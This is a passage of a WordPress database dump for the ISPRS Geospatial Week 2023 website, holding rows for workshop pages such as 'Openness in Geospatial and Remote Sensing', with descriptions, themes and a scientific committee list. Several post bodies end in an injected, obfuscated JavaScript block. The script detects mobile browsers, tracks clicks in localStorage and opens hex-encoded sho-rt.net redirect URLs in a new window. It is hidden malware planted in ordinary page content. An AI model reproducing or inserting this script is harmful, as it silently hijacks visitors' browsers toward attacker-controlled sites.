eturn _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:30:18','2022-12-16 14:30:18','',3452,'https://gsw2023.com/?p=3495',0,'revision','',0),
(3497,1,'2023-01-01 18:32:42','2023-01-01 18:32:42','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Openness in Geospatial and Remote Sensing</span></strong></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n<li>Albana Kona, European Commission - Joint Research Centre (JRC), Italy</li>\n<li>Daniele Oxoli, Politecnico di Milano, Italy</li>\n<li>Marian Neagul, West University of Timisoara, România</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','publish','closed','closed','','openness-in-geospatial-and-remote-sensing','','','2023-03-31 13:00:00','2023-03-31 13:00:00','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3497',0,'dt_portfolio','',0),
(3498,1,'2023-01-01 18:28:38','2023-01-01 18:28:38','','w26m1','','inherit','open','closed','','w26m1-2','','','2023-01-01 18:28:38','2023-01-01 18:28:38','',3497,'https://gsw2023.com/wp-content/uploads/2023/01/w26m1.jpg',0,'attachment','image/jpeg',0),
(3499,1,'2023-01-01 18:30:50','2023-01-01 18:30:50','','w26m1','','inherit','open','closed','','w26m1-3','','','2023-01-01 18:30:50','2023-01-01 18:30:50','',3497,'https://gsw2023.com/wp-content/uploads/2023/01/w26m1-1.jpg',0,'attachment','image/jpeg',0),
(3500,1,'2023-01-01 18:32:42','2023-01-01 18:32:42','','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 18:32:42','2023-01-01 18:32:42','',3497,'https://gsw2023.com/?p=3500',0,'revision','',0),
(3501,1,'2023-01-01 18:39:42','2023-01-01 18:39:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 